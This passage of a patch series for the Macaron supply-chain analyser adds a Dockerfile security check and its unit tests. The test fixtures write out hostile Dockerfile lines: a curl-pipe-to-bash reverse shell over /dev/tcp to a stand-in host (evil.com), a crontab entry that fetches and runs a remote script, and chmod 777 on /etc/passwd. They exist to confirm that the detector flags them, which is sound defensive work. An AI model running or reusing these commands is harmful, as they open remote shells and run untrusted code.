before using 'in' + if not isinstance(security_issues_dict.get("issues_by_severity"), dict): + security_issues_dict["issues_by_severity"] = {} + if not isinstance(security_issues_dict.get("issues_by_instruction"), dict): + security_issues_dict["issues_by_instruction"] = {} + + issues_by_severity = security_issues_dict.get("issues_by_severity") + issues_by_instruction = security_issues_dict.get("issues_by_instruction") + + if not isinstance(issues_by_severity, dict): + issues_by_severity = {} + security_issues_dict["issues_by_severity"] = issues_by_severity + if not isinstance(issues_by_instruction, dict): + issues_by_instruction = {} + security_issues_dict["issues_by_instruction"] = issues_by_instruction + + if severity not in issues_by_severity: + issues_by_severity[severity] = 0 + issues_by_severity[severity] += 1 + + if instruction not in issues_by_instruction: + issues_by_instruction[instruction] = 0 + issues_by_instruction[instruction] += 1 + + # Create facts + facts = DockerfileSecurityFacts( + base_image_name=base_image_name, + base_image_version=base_image_version, + security_issues=security_issues_dict, + risk_score=risk_score, + issues_count=len(issues), + confidence=confidence, + ) + + result_tables.append(facts) + + return CheckResultData( + result_tables=result_tables, + result_type=result_type, + ) + + except (OSError, ValueError) as e: + logger.error("Error processing Dockerfile security check: %s", e) + return CheckResultData(result_tables=result_tables, result_type=CheckResultType.UNKNOWN) + + def _get_dockerfile_content(self, ctx: AnalyzeContext) -> str | None: + """ + Get Dockerfile content from the repository. + + Parameters + ---------- + ctx : AnalyzeContext + The analyze context containing repository information + + Returns + ------- + Optional[str] + The Dockerfile content as string, or None if not found + """ + # Try different ways to get the repository path + repo_path = None + + # Method 1: Check if there's a component with repository info + if hasattr(ctx, "component") and ctx.component: + if hasattr(ctx.component, "repository") and ctx.component.repository: + if hasattr(ctx.component.repository, "fs_path"): + repo_path = ctx.component.repository.fs_path + logger.debug("Found repo_path via component.repository.fs_path: %s", repo_path) + + # Common Dockerfile names + dockerfile_names = ["Dockerfile", "dockerfile", "Dockerfile.prod", "Dockerfile.dev"] + + # Ensure repo_path is not None before proceeding + if repo_path is None: + logger.debug("repo_path is None, cannot search for Dockerfile.") + return None + + # Check root directory first + for dockerfile_name in dockerfile_names: + dockerfile_path = os.path.join(repo_path, dockerfile_name) + if os.path.exists(dockerfile_path): + try: + with open(dockerfile_path, encoding="utf-8") as f: + content = f.read() + logger.info("Found Dockerfile at: %s", dockerfile_path) + return content + except (OSError, UnicodeDecodeError) as e: + logger.debug("Error reading Dockerfile %s: %s", dockerfile_path, e) + + # Search recursively for Dockerfiles (limit depth to avoid deep recursion) + max_depth = 3 + for root, dirs, files in os.walk(repo_path): + # Calculate current depth + depth = root[len(repo_path) :].count(os.sep) + if depth >= max_depth: + dirs[:] = [] # Don't recurse deeper + continue + + # Skip hidden directories and common non-source directories + dirs[:] = [d for d in dirs if not d.startswith(".") and d not in ["node_modules", "venv", "env"]] + + for file in files: + if file.lower().startswith("dockerfile"): + dockerfile_path = os.path.join(root, file) + try: + with open(dockerfile_path, encoding="utf-8") as f: + content = f.read() + logger.info("Found Dockerfile at: %s", dockerfile_path) + return content + except (OSError, UnicodeDecodeError) as e: + logger.debug("Error reading Dockerfile %s: %s", dockerfile_path, e) + + logger.info("No Dockerfile found in repository at path: %s", repo_path) + return None + + +registry.register(DockerfileSecurityCheck()) From 081a4c688130fc70a357fb06c0660977223e767b Mon Sep 17 00:00:00 2001 From: Achraf Maghous Date: Mon, 7 Jul 2025 15:00:39 +0100 Subject: [PATCH 3/3] feat: Creating unit tests for insecure_patterns_dockerfile_check Changes: -Added unit tests handling different Docker files Signed-off-by: Achraf Maghous --- ...test_insecure_patterns_dockerfile_check.py | 524 ++++++++++++++++++ 1 file changed, 524 insertions(+) create mode 100644 tests/slsa_analyzer/checks/test_insecure_patterns_dockerfile_check.py diff --git a/tests/slsa_analyzer/checks/test_insecure_patterns_dockerfile_check.py b/tests/slsa_analyzer/checks/test_insecure_patterns_dockerfile_check.py new file mode 100644 index 000000000..dffd3e8ba --- /dev/null +++ b/tests/slsa_analyzer/checks/test_insecure_patterns_dockerfile_check.py @@ -0,0 +1,524 @@ +# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""Module to test the Dockerfile security check.""" + +from pathlib import Path +from unittest.mock import Mock, patch + +import pytest + +from macaron.database.table_definitions import Repository +from macaron.slsa_analyzer.checks.base_check import BaseCheck +from macaron.slsa_analyzer.checks.check_result import CheckResultType, Confidence +from macaron.slsa_analyzer.checks.insecure_patterns_dockerfile_check import ( + DockerfileSecurityAnalyzer, + DockerfileSecurityCheck, + DockerfileSecurityFacts, +) +from tests.conftest import MockAnalyzeContext + + +class TestDockerfileSecurityAnalyzer: + """Test cases for DockerfileSecurityAnalyzer.""" + + analyzer = DockerfileSecurityAnalyzer() + + def setup_method(self) -> None: + """Set up test fixtures.""" + + def test_analyze_empty_dockerfile(self) -> None: + """Test analyzing an empty Dockerfile.""" + issues, risk_score, base_image, version = self.analyzer.analyze_dockerfile_content("") + assert len(issues) == 0 + assert risk_score == 0 + assert base_image == "unknown" + assert version == "unknown" + + def test_analyze_invalid_dockerfile(self) -> None: + """Test analyzing an invalid Dockerfile.""" + invalid_content = "THIS IS NOT VALID DOCKERFILE CONTENT {{{invalid json" + _, _, base_image, version = self.analyzer.analyze_dockerfile_content(invalid_content) + # Should handle parse errors gracefully + assert base_image == "unknown" + assert version == "unknown" + + @pytest.mark.parametrize( + ("dockerfile_content", "expected_base_image", "expected_version", "min_risk_score"), + [ + pytest.param("FROM ubuntu:latest\nRUN apt-get update", "ubuntu", "latest", 15, id="test_from_latest_tag"), + pytest.param("FROM ubuntu\nRUN apt-get update", "ubuntu", "latest", 15, id="test_from_no_tag"), + pytest.param("FROM ubuntu:16.04\nRUN apt-get update", "ubuntu", "16.04", 25, id="test_from_old_image"), + pytest.param( + "FROM python:2.7-slim\nRUN pip install requests", + "python", + "2.7-slim", + 25, + id="test_from_deprecated_python", + ), + ], + ) + def test_from_instruction_analysis( + self, dockerfile_content: str, expected_base_image: str, expected_version: str, min_risk_score: int + ) -> None: + """Test FROM instruction analysis with various scenarios.""" + issues, risk_score, base_image, version = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + assert base_image == expected_base_image + assert version == expected_version + assert risk_score >= min_risk_score + assert any(issue["instruction"] == "FROM" for issue in issues) + + @pytest.mark.parametrize( + ("dockerfile_content", "expected_issue_count", "min_risk_score"), + [ + pytest.param("FROM ubuntu:20.04\nUSER root\nRUN apt-get update", 1, 30, id="test_user_root"), + pytest.param("FROM ubuntu:20.04\nUSER 0", 1, 30, id="test_user_numeric_root"), + pytest.param("FROM ubuntu:20.04\nUSER appuser", 0, 0, id="test_user_non_root"), + ], + ) + def test_user_instruction_analysis( + self, dockerfile_content: str, expected_issue_count: int, min_risk_score: int + ) -> None: + """Test USER instruction analysis.""" + issues, risk_score, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + user_issues = [issue for issue in issues if issue["instruction"] == "USER"] + assert len(user_issues) == expected_issue_count + if expected_issue_count > 0: + assert risk_score >= min_risk_score + + @pytest.mark.parametrize( + ("expose_instruction", "expected_issues"), + [ + pytest.param("EXPOSE 22", ["22"], id="test_expose_ssh"), + pytest.param("EXPOSE 3306", ["3306"], id="test_expose_mysql"), + pytest.param("EXPOSE 22 23", ["22", "23"], id="test_expose_multiple_risky"), + pytest.param("EXPOSE 999", ["privileged port"], id="test_expose_privileged"), + pytest.param("EXPOSE 80 443", [], id="test_expose_safe_ports"), + pytest.param("EXPOSE 8080/tcp", [], id="test_expose_with_protocol"), + pytest.param("EXPOSE 100-200", ["privileged port"], id="test_expose_port_range"), + ], + ) + def test_expose_instruction_analysis(self, expose_instruction: str, expected_issues: list[str]) -> None: + """Test EXPOSE instruction analysis with various port configurations.""" + dockerfile_content = f"FROM ubuntu:20.04\n{expose_instruction}" + issues, _, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + expose_issues = [issue for issue in issues if issue["instruction"] == "EXPOSE"] + + if expected_issues: + assert len(expose_issues) >= len(expected_issues) + for expected in expected_issues: + assert any(expected in issue["issue"] for issue in expose_issues) + else: + assert len(expose_issues) == 0 + + @pytest.mark.parametrize( + ("env_content", "expected_keywords"), + [ + pytest.param("ENV DATABASE_PASSWORD=secret123", ["pass"], id="test_env_password"), + pytest.param( + "ENV API_KEY=abcd1234\nENV SESSION_TOKEN=xyz789", + ["key", "session"], # Both should be lowercase since content_lower is used + id="test_env_multiple_sensitive", + ), + pytest.param("ENV MAINTAINER_EMAIL=admin@example.com", ["Email address"], id="test_env_email"), + pytest.param("ENV NODE_ENV=production", [], id="test_env_safe"), + ], + ) + def test_env_instruction_analysis(self, env_content: str, expected_keywords: list[str]) -> None: + """Test ENV instruction analysis for sensitive information.""" + dockerfile_content = f"FROM ubuntu:20.04\n{env_content}" + issues, _, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + env_issues = [issue for issue in issues if issue["instruction"] == "ENV"] + + if expected_keywords: + assert len(env_issues) >= len(expected_keywords) + for keyword in expected_keywords: + assert any(keyword.lower() in issue["issue"].lower() for issue in env_issues) + else: + assert len(env_issues) == 0 + + @pytest.mark.parametrize( + ("volume_instruction", "expected_risk_score"), + [ + pytest.param("VOLUME /var/run/docker.sock", 40, id="test_volume_docker_socket"), + pytest.param('VOLUME ["/etc/docker", "/root/.ssh"]', 80, id="test_volume_multiple_unsafe"), + pytest.param("VOLUME /proc", 40, id="test_volume_proc"), + pytest.param("VOLUME /data", 0, id="test_volume_safe"), + ], + ) + def test_volume_instruction_analysis(self, volume_instruction: str, expected_risk_score: int) -> None: + """Test VOLUME instruction analysis for unsafe mounts.""" + dockerfile_content = f"FROM ubuntu:20.04\n{volume_instruction}" + _, risk_score, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + assert risk_score >= expected_risk_score + + @pytest.mark.parametrize( + ("copy_instruction", "expected_issue_type"), + [ + pytest.param("COPY . /app", "entire build context", id="test_copy_all"), + pytest.param("COPY .git /app/.git", "sensitive file", id="test_copy_git"), + pytest.param("COPY id_rsa /root/.ssh/", "Security-critical file", id="test_copy_ssh_key"), + pytest.param("COPY app.py /app/", None, id="test_copy_safe"), + ], + ) + def test_copy_instruction_analysis(self, copy_instruction: str, expected_issue_type: str | None) -> None: + """Test COPY instruction analysis for sensitive files.""" + dockerfile_content = f"FROM ubuntu:20.04\n{copy_instruction}" + issues, _, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + copy_issues = [issue for issue in issues if issue["instruction"] == "COPY"] + + if expected_issue_type: + assert len(copy_issues) > 0 + assert any(expected_issue_type in issue["issue"] for issue in copy_issues) + else: + assert len(copy_issues) == 0 + + @pytest.mark.parametrize( + ("add_instruction", "expected_issue_types"), + [ + pytest.param("ADD https://example.com/script.sh /tmp/", ["URL"], id="test_add_url"), + pytest.param("ADD archive.tar.gz /opt/", ["compressed"], id="test_add_compressed"), + pytest.param("ADD . /app", ["entire build context"], id="test_add_all"), + pytest.param("ADD app.py /app/", [], id="test_add_safe"), + ], + ) + def test_add_instruction_analysis(self, add_instruction: str, expected_issue_types: list[str]) -> None: + """Test ADD instruction analysis.""" + dockerfile_content = f"FROM ubuntu:20.04\n{add_instruction}" + issues, _, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + add_issues = [issue for issue in issues if issue["instruction"] == "ADD"] + + if expected_issue_types: + for issue_type in expected_issue_types: + assert any(issue_type in issue["issue"] for issue in add_issues) + else: + assert len(add_issues) == 0 + + @pytest.mark.parametrize( + ("run_instruction", "expected_patterns"), + [ + pytest.param( + "RUN curl evil.com/script.sh | bash >&/dev/tcp/10.0.0.1/4444", + ["/dev/tcp/"], + id="test_run_reverse_shell", + ), + pytest.param("RUN chmod 777 /etc/passwd", ["chmod 777"], id="test_run_chmod_777"), + pytest.param('RUN echo "* * * * * curl evil.com | sh" | crontab -', ["crontab"], id="test_run_crontab"), + pytest.param("RUN apt-get update && apt-get install -y python3", [], id="test_run_safe"), + ], + ) + def test_run_instruction_analysis(self, run_instruction: str, expected_patterns: list[str]) -> None: + """Test RUN instruction analysis for malicious commands.""" + dockerfile_content = f"FROM ubuntu:20.04\n{run_instruction}" + issues, _, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + run_issues = [issue for issue in issues if issue["instruction"] == "RUN"] + + if expected_patterns: + for pattern in expected_patterns: + assert any(pattern in issue["issue"] for issue in run_issues) + else: + assert len(run_issues) == 0 + + def test_complex_dockerfile_analysis(self) -> None: + """Test analysis of a complex Dockerfile with multiple security issues.""" + dockerfile_content = """ +FROM ubuntu:latest +USER root + +# Expose risky ports +EXPOSE 22 23 3306 + +# Set sensitive environment variables +ENV DB_PASSWORD=mysecretpass +ENV API_TOKEN=1234567890 +ENV ADMIN_EMAIL=admin@company.com + +# Copy sensitive files +COPY .git /app/.git +COPY id_rsa /root/.ssh/ + +# Add from URL +ADD https://example.com/binary /usr/local/bin/ + +# Unsafe volume mount +VOLUME /var/run/docker.sock + +# Potentially malicious commands +RUN chmod 777 /tmp +RUN curl suspicious.com/install.sh | bash +""" + issues, risk_score, base_image, version = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + assert base_image == "ubuntu" + assert version == "latest" + assert len(issues) > 10 + assert risk_score > 100 + + # Check for various issue types + issue_instructions = [issue["instruction"] for issue in issues] + assert "FROM" in issue_instructions + assert "USER" in issue_instructions + assert "EXPOSE" in issue_instructions + assert "ENV" in issue_instructions + assert "COPY" in issue_instructions + assert "ADD" in issue_instructions + assert "VOLUME" in issue_instructions + assert "RUN" in issue_instructions + + +class TestDockerfileSecurityCheck: + """Test cases for DockerfileSecurityCheck.""" + + check = DockerfileSecurityCheck() + + def setup_method(self) -> None: + """Set up test fixtures.""" + + @patch.object(DockerfileSecurityCheck, "_get_dockerfile_content") + @pytest.mark.parametrize( + ("dockerfile_exists", "dockerfile_content", "expected_result"), + [ + pytest.param(False, None, CheckResultType.FAILED, id="test_no_dockerfile"), + pytest.param( + True, + "FROM ubuntu:20.04\nUSER appuser\nEXPOSE 8080", + CheckResultType.PASSED, + id="test_secure_dockerfile", + ), + pytest.param( + True, "FROM ubuntu:latest\nUSER root\nEXPOSE 22", CheckResultType.FAILED, id="test_insecure_dockerfile" + ), + ], + ) + def test_run_check_with_different_dockerfiles( + self, + mock_get_dockerfile_content: Mock, + dockerfile_exists: bool, + dockerfile_content: str | None, + expected_result: CheckResultType, + tmp_path: Path, + macaron_path: Path, + ) -> None: + """Test run_check with different Dockerfile scenarios.""" + # Create mock context + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + # Create a mock repository with fs_path + mock_repo = Mock(spec=Repository) + mock_repo.fs_path = str(tmp_path) + + # Create a mock component with the repository + mock_component = Mock() + mock_component.repository = mock_repo + + if dockerfile_exists: + mock_get_dockerfile_content.return_value = dockerfile_content + else: + mock_get_dockerfile_content.return_value = None + + # Run the check + result = self.check.run_check(ctx) + + assert result.result_type == expected_result + + def test_run_check_no_component(self, tmp_path: Path, macaron_path: Path) -> None: + """Test run_check when component is None.""" + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + result = self.check.run_check(ctx) + + assert result.result_type == CheckResultType.FAILED + assert len(result.result_tables) == 0 + + @patch.object(DockerfileSecurityCheck, "_get_dockerfile_content") + def test_run_check_with_subdirectory_dockerfile( + self, mock_get_dockerfile_content: Mock, tmp_path: Path, macaron_path: Path + ) -> None: + """Test finding Dockerfile in subdirectory.""" + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + # Create mock repository + mock_repo = Mock(spec=Repository) + mock_repo.fs_path = str(tmp_path) + + mock_component = Mock() + mock_component.repository = mock_repo + + # Mock the Dockerfile content + mock_get_dockerfile_content.return_value = "FROM node:16\nUSER node" + + result = self.check.run_check(ctx) + + assert result.result_type == CheckResultType.PASSED + assert len(result.result_tables) == 1 + + facts = result.result_tables[0] + assert isinstance(facts, DockerfileSecurityFacts) + assert facts.base_image_name == "node" + assert facts.base_image_version == "16" + + @patch.object(DockerfileSecurityCheck, "_get_dockerfile_content") + @pytest.mark.parametrize( + ("risk_score", "expected_result_type", "expected_confidence"), + [ + pytest.param(0, CheckResultType.PASSED, Confidence.HIGH, id="test_no_risk"), + pytest.param(30, CheckResultType.PASSED, Confidence.MEDIUM, id="test_low_risk"), + pytest.param(60, CheckResultType.FAILED, Confidence.MEDIUM, id="test_medium_risk"), + pytest.param(120, CheckResultType.FAILED, Confidence.HIGH, id="test_high_risk"), + ], + ) + def test_risk_score_to_result_mapping( + self, + mock_get_dockerfile_content: Mock, + risk_score: int, + expected_result_type: CheckResultType, + expected_confidence: Confidence, + tmp_path: Path, + macaron_path: Path, + ) -> None: + """Test that risk scores map to correct result types and confidence levels.""" + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + mock_repo = Mock(spec=Repository) + mock_repo.fs_path = str(tmp_path) + mock_component = Mock() + mock_component.repository = mock_repo + + # Create a Dockerfile that will produce the desired risk score + if risk_score == 0: + dockerfile_content = "FROM ubuntu:20.04\nUSER appuser" + elif risk_score == 30: + dockerfile_content = "FROM ubuntu:latest\nUSER root" + elif risk_score == 60: + dockerfile_content = "FROM ubuntu:latest\nUSER root\nEXPOSE 22" + else: # risk_score >= 100 + dockerfile_content = """ +FROM ubuntu:latest +USER root +EXPOSE 22 +ENV PASSWORD=secret +VOLUME /var/run/docker.sock +RUN chmod 777 /etc +""" + + # Mock the return value + mock_get_dockerfile_content.return_value = dockerfile_content + + result = self.check.run_check(ctx) + + assert result.result_type == expected_result_type + if result.result_tables: + facts = result.result_tables[0] + assert facts.confidence == expected_confidence + + def test_run_check_os_error_handling(self, tmp_path: Path, macaron_path: Path) -> None: + """Test error handling when OS error occurs.""" + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + mock_repo = Mock(spec=Repository) + mock_repo.fs_path = str(tmp_path) + + # Create a Dockerfile but make it unreadable + dockerfile_path = tmp_path / "Dockerfile" + dockerfile_path.write_text("FROM ubuntu:20.04") + + # Mock open to raise OSError + with patch("builtins.open", side_effect=OSError("Permission denied")): + result = self.check.run_check(ctx) + + assert result.result_type == CheckResultType.FAILED + + def test_check_metadata(self) -> None: + """Test check metadata and configuration.""" + # Use the public interface method to get check_id + + # The check_id is accessible via get_check_id method or similar + # For now, we'll just verify the check was properly initialized + assert isinstance(self.check, BaseCheck) + assert hasattr(self.check, "result_on_skip") + assert self.check.result_on_skip == CheckResultType.FAILED + + @patch.object(DockerfileSecurityCheck, "_get_dockerfile_content") + def test_security_issues_grouping( + self, mock_get_dockerfile_content: Mock, tmp_path: Path, macaron_path: Path + ) -> None: + """Test that security issues are properly grouped by severity and instruction.""" + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + mock_repo = Mock(spec=Repository) + mock_repo.fs_path = str(tmp_path) + mock_component = Mock() + mock_component.repository = mock_repo + + # Mock Dockerfile with multiple issues + dockerfile_content = """ +FROM ubuntu:latest +USER root +EXPOSE 22 3306 +ENV PASSWORD=secret +ENV TOKEN=abcd1234 +""" + mock_get_dockerfile_content.return_value = dockerfile_content + + result = self.check.run_check(ctx) + assert len(result.result_tables) > 0 + facts = result.result_tables[0] + assert isinstance(facts, DockerfileSecurityFacts) + + security_issues = facts.security_issues + assert "total_issues" in security_issues + total_issues = security_issues.get("total_issues") + assert isinstance(total_issues, int) + assert total_issues > 0 + + assert "issues_by_severity" in security_issues + assert isinstance(security_issues["issues_by_severity"], dict) + assert len(security_issues["issues_by_severity"]) > 0 + + assert "issues_by_instruction" in security_issues + assert isinstance(security_issues["issues_by_instruction"], dict) + assert "FROM" in security_issues["issues_by_instruction"] + assert "USER" in security_issues["issues_by_instruction"] + assert "EXPOSE" in security_issues["issues_by_instruction"] + assert "ENV" in security_issues["issues_by_instruction"] + + +class TestDockerfileSecurityFacts: + """Test cases for DockerfileSecurityFacts ORM model.""" + + def test_facts_creation(self) -> None: + """Test creating DockerfileSecurityFacts instance.""" + security_issues = { + "total_issues": 3, + "risk_score": 45, + "issues_by_severity": {"HIGH": 1, "MEDIUM": 2}, + "issues_by_instruction": {"FROM": 1, "USER": 1, "EXPOSE": 1}, + "detailed_issues": [ + {"severity": "HIGH", "instruction": "USER", "issue": "Running as root", "risk_points": "30"} + ], + } + + facts = DockerfileSecurityFacts( + base_image_name="ubuntu", + base_image_version="20.04", + security_issues=security_issues, + risk_score=45, + issues_count=3, + confidence=0.8, + ) + + assert facts.base_image_name == "ubuntu" + assert facts.base_image_version == "20.04" + assert facts.risk_score == 45 + assert facts.issues_count == 3 + assert facts.confidence == 0.8 + assert facts.security_issues["total_issues"] == 3 + assert facts.security_issues["risk_score"] == 45